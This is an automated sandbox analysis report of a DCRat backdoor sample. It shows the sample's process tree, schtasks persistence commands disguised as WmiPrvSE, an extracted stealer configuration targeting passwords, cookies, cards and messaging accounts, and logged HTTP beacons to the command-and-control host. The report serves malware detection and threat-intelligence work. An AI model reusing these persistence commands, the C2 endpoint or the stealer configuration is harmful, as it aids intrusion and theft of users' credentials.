Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe

Overview

General Information

Sample Name:HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
Analysis ID:1337252
MD5:5d329190630c5c051e1b2c4ad4c69abd
SHA1:0227d4e1597ca90477cad5fc3a960f3590457031
SHA256:6974f159cb6e056fd9675ec4ecb6d271a7d6bb69711a295be593091d3bcb9e45
Tags:DCRatexe
Infos:

Detection

DCRat
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Yara detected DCRat
Found malware configuration
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for dropped file
Creates multiple autostart registry keys
Creates processes via WMI
Machine Learning detection for sample
.NET source code contains potential unpacker
Uses schtasks.exe or at.exe to add and modify task schedules
Drops executable to a common third party application directory
Yara detected Generic Downloader
.NET source code contains method to dynamically call methods (often used by packers)
Creates an undocumented autostart registry key
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Creates a process in suspended mode (likely to inject code)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
PE file contains sections with non-standard names
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Contains functionality to communicate with device drivers
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
File is packed with WinRar
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

  • System is w10x64
  • HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe (PID: 6476 cmdline: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe MD5: 5D329190630C5C051E1B2C4AD4C69ABD)
    • wscript.exe (PID: 6596 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbe" MD5: FF00E0480075B095948000BDC66E81F0)
      • cmd.exe (PID: 6876 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Adobe\87tDm8T1lOvAjdSEmWMIMA3JTpcTMB.bat" " MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 6900 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • hui.exe (PID: 7000 cmdline: C:\Users\user\AppData\Roaming\Adobe\hui.exe MD5: 1B46DAD7064609344351AC9EFE3F9AAB)
          • cmd.exe (PID: 5672 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
            • conhost.exe (PID: 7092 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • chcp.com (PID: 6472 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
            • w32tm.exe (PID: 7056 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
            • hui.exe (PID: 5664 cmdline: "C:\Users\user\AppData\Roaming\Adobe\hui.exe" MD5: 1B46DAD7064609344351AC9EFE3F9AAB)
  • schtasks.exe (PID: 2228 cmdline: schtasks.exe /create /tn "KQihinlofznONtA" /sc ONLOGON /tr "'C:\PerfLogs\KQihinlofznONtA.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • schtasks.exe (PID: 4928 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\PerfLogs\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • schtasks.exe (PID: 7032 cmdline: schtasks.exe /create /tn "WmiPrvSE" /sc ONLOGON /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe'" /rl HIGHEST /f MD5: 76CD6626DD8834BD4A42E6A565104DC2)
  • KQihinlofznONtA.exe (PID: 5084 cmdline: C:\PerfLogs\KQihinlofznONtA.exe MD5: 1B46DAD7064609344351AC9EFE3F9AAB)
  • WmiPrvSE.exe (PID: 4136 cmdline: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe MD5: 1B46DAD7064609344351AC9EFE3F9AAB)
  • WmiPrvSE.exe (PID: 6476 cmdline: "C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exe" MD5: 1B46DAD7064609344351AC9EFE3F9AAB)
  • cleanup
{"H1": "http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GT", "H2": "http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GT", "TAG": "", "MUTEX": "DCR_MUTEX-jzFMg9WBCIr3URsB3Ftf", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 2, "ASCFG": {"ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": false, "ASP": "%SystemDrive% - Slow", "AK": false, "AD": false}
SourceRuleDescriptionAuthorStrings
C:\PerfLogs\KQihinlofznONtA.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
    C:\Users\user\AppData\Roaming\Adobe\hui.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\PerfLogs\WmiPrvSE.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
        C:\PerfLogs\WmiPrvSE.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
          SourceRuleDescriptionAuthorStrings
          00000008.00000002.1816721235.0000000002AFB000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
            00000009.00000002.1760913066.000000000299D000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
              00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
                • 0x1d48c:$s8: Win32_ComputerSystem
                • 0x1d59c:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
                • 0x1d63a:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
                • 0x1d750:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
                • 0x17b28:$cnc4: POST / HTTP/1.1
                00000008.00000002.1816721235.0000000002A91000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  Click to see the 12 entries
                  SourceRuleDescriptionAuthorStrings
                  0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.4ad411f.1.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                    0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                      4.0.hui.exe.1b0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
                        No Sigma rule has matched
                        No Snort rule has matched

                        Click to jump to signature section

                        Show All Signature Results

                        AV Detection

                        barindex
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeAvira: detection malicious, Label: HEUR/AGEN.1323343
                        Source: C:\Users\user\AppData\Roaming\Adobe\sN8j8UtUmLUEbzv.vbeAvira: detection malicious, Label: VBS/Runner.VPG
                        Source: C:\PerfLogs\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323343
                        Source: C:\Users\user\AppData\Local\Temp\zoUR8TSZV2.batAvira: detection malicious, Label: BAT/Runner.rghmi
                        Source: C:\PerfLogs\KQihinlofznONtA.exeAvira: detection malicious, Label: HEUR/AGEN.1323343
                        Source: C:\PerfLogs\WmiPrvSE.exeAvira: detection malicious, Label: HEUR/AGEN.1323343
                        Source: 00000009.00000002.1760913066.000000000299D000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"H1": "http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GT", "H2": "http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GT", "TAG": "", "MUTEX": "DCR_MUTEX-jzFMg9WBCIr3URsB3Ftf", "LDTM": false, "DBG": false, "BCS": 0, "AUR": 2, "ASCFG": {"ignorepartiallyemptydata": false, "cookies": true, "passwords": true, "forms": true, "cc": true, "history": false, "telegram": true, "steam": true, "discord": true, "filezilla": true, "screenshot": true, "clipboard": true, "sysinfo": true}, "AS": true, "ASO": false, "ASP": "%SystemDrive% - Slow", "AK": false, "AD": false}
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeReversingLabs: Detection: 68%
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeVirustotal: Detection: 65%Perma Link
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeAvira: detected
                        Source: C:\PerfLogs\KQihinlofznONtA.exeReversingLabs: Detection: 87%
                        Source: C:\PerfLogs\KQihinlofznONtA.exeVirustotal: Detection: 60%Perma Link
                        Source: C:\PerfLogs\WmiPrvSE.exeReversingLabs: Detection: 87%
                        Source: C:\PerfLogs\WmiPrvSE.exeVirustotal: Detection: 60%Perma Link
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeReversingLabs: Detection: 87%
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeVirustotal: Detection: 60%Perma Link
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeReversingLabs: Detection: 87%
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeVirustotal: Detection: 60%Perma Link
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeJoe Sandbox ML: detected
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeJoe Sandbox ML: detected
                        Source: C:\PerfLogs\WmiPrvSE.exeJoe Sandbox ML: detected
                        Source: C:\PerfLogs\KQihinlofznONtA.exeJoe Sandbox ML: detected
                        Source: C:\PerfLogs\WmiPrvSE.exeJoe Sandbox ML: detected
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeJump to behavior
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\24dbde2999530ef5fd907494bc374d663924116cJump to behavior
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                        Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007DA5F4 FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,0_2_007DA5F4
                        Source: C:\Users\user\Desktop\HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exeCode function: 0_2_007EB8E0 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,0_2_007EB8E0
                        Source: C:\Users\user\AppData\Roaming\Adobe\hui.exeCode function: 4x nop then jmp 00007FFD9BAE26F3h4_2_00007FFD9BAE1EF4
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeCode function: 4x nop then jmp 00007FFD9BAB26F3h9_2_00007FFD9BAB1EF4
                        Source: C:\Program Files\Windows Defender Advanced Threat Protection\en-GB\WmiPrvSE.exeCode function: 4x nop then jmp 00007FFD9BAB26F3h18_2_00007FFD9BAB1EF4

                        Networking

                        barindex
                        Source: Yara matchFile source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.4ad411f.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.3.HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe.49be11f.0.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 4.0.hui.exe.1b0000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\PerfLogs\KQihinlofznONtA.exe, type: DROPPED
                        Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Adobe\hui.exe, type: DROPPED
                        Source: Yara matchFile source: C:\PerfLogs\WmiPrvSE.exe, type: DROPPED
                        Source: Yara matchFile source: C:\PerfLogs\WmiPrvSE.exe, type: DROPPED
                        Source: Malware configuration extractorURLs: http://host1835875.hostland.pro/@0NXZ0xGbvB3Zu9Gb39GT
                        Source: global trafficHTTP traffic detected: GET /Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: host1835875.hostland.proConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: host1835875.hostland.pro
                        Source: global trafficHTTP traffic detected: GET /Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: host1835875.hostland.proConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: host1835875.hostland.pro
                        Source: WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DC4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://host1835875.hostland.pro
                        Source: WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002CB5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://host1835875.hostland.pro/
                        Source: WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002AC8000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002A9F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://host1835875.hostland.pro/Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b
                        Source: WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DCE000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://host1835875.hostland.pro/Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf
                        Source: hui.exe, 00000004.00000002.1741908323.0000000002619000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002A9F000.00000004.00000800.00020000.00000000.sdmp, WmiPrvSE.exe, 00000012.00000002.2531367222.0000000002DA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                        Source: HEUR-Backdoor.MSIL.LightStone.gen-6974f159cb6.exe, hui.exe.0.dr, WmiPrvSE.exe.4.dr, KQihinlofznONtA.exe.4.dr, WmiPrvSE.exe0.4.drString found in binary or memory: https://research.activision.com/opensourceD
                        Source: WmiPrvSE.exe, 00000009.00000002.1760913066.0000000002931000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/
                        Source: unknownDNS traffic detected: queries for: host1835875.hostland.pro
                        Source: global trafficHTTP traffic detected: GET /Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: host1835875.hostland.proConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /Lowlongpolltest.php?fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&fpx0A0VKNNT3jT2dNBkuvNR98C5s=1yQEvZAPO2s HTTP/1.1Accept: */*Content-Type: text/htmlUser-Agent: Mozilla/5.0 (Linux; Android 6.0; HTC One M9 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.98 Mobile Safari/537.3Host: host1835875.hostland.pro
                        Source: global trafficHTTP traffic detected: GET /Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: host1835875.hostland.proConnection: Keep-Alive
                        Source: global trafficHTTP traffic detected: GET /Lowlongpolltest.php?vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z&3998e4b767cc58057b788963dc557b0a=79a349ba785d906a76eb09f6c1191279&a186b4e8b8ab60f6ea84885b889965cc=QMzcTNzIWZ1UjM5Y2MhlzMmNTNxQ2YkF2M4cTZwgTMwMjNjFzNxkzM&vsUBxK4ppQZ8aDT8iyUE4KfcwtSFC=9aubHCzwLXJHHcAcgf54Zhii&lN2OD2zm5Q9N95QIwn65xDDbUNxJIVc=Lcgz7hIfUeMLBOgjpwm4mnLiJb4z HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (PlayStation 4 3.11) AppleWebKit/537.73 (KHTML, like Gecko)Host: host1835875.hostland.pro
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 05 Nov 2023 13:27:06 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 05 Nov 2023 13:27:06 GMTContent-Type: text/htmlContent-Length: 548Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and 